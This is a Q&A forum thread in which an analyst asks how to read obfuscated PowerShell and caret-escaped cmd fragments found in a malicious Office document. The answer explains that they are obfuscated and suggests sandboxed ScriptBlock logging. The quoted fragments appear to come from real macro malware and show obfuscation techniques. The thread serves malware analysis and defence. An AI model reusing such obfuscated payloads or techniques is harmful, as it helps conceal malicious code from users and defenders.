# Shell or bash commands in office files

Tags: powershell, ms-office

While analyzing a doc file, I see some power shell commands such as

```
Execute Command - params "PowersHeLL  & ( $sHELlId[1]+$ShEllID[13]+'X')( [StRinG]::joiN( '' ,([CHaR[]] (62 , 116, 109 ,84 ,119 , 86,88 ,58,39, 58 , 116 ,127 ,109 ,55, 117,120,112, 127 ,121,110,58 ,104,123 , 116,126, 117,119, 33 ,62 , 116 ,78 ,116 , 86, 77 ,95 ,58, 39 ,58 , 116 ,127 , 109
```

or

```
Run - params [Function FqLHmmC ([vwPoLiLXwz]): 7 statement(s), 'cmd /c ^f^O^r ; ;  /^F , ;  "   tokens=  2   delims=EFHMN" ; %^h ;  ; ^iN  ; ( , \' ;  ft^^YpE , ; ^| ;  fiNd^^str , H^^C \' ; ; ) ; ^do  , ;  %^h;  ;  n8ZAmId/vs~*t^@^Y)PUA^     ; ;  h0XobFu/^C  "  , , (   (s^ET  ^  ^`  ^ =E=6^l2u^\\^h^s\'^y4D^w^XoWJNzL@^b^anGx, ^Ri^{f.P1+Fcme^3^v^0/jB^(krd;^}Z^)-^:tM^Sg^$^pOC)
```

How these are interpreted? For example, I guess `62 , 116, 109 ,84` are decimal values. However, converting them to ascii are not meaningful. The second one, e.g `fiNd^^str , H^^C \' ; ; ) ; ^do` sounds like a bash script. But it is not meaningful.

Does that mean, they are obfuscated? or obfuscation is something else?!

Answer (score 2, accepted):

> How these are interpreted?

Well, these are parsed and interpreted like any other PowerShell code. It's just harder to read for humans. `[char]116` is just that. You can type it into PowerShell and find out what it is (ascii code for `t`).

> Does that mean, they are obfuscated?

Yes.

Easiest way to deobfuscate is running the [ScriptBlock logging](https://getadmx.com/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScriptBlockLogging) enabled. The eventlog will unveil what actually is being executed. Since you don't know what you are going to execut: Only do this in an isolated sandbox environment!

Comment: So, `62 116 109 84 119 86 88` is `>tmTwVX` and the result is obfuscate done. Am I right? I mean, by even converting the decimals to text, we reach the obfuscate code. Right?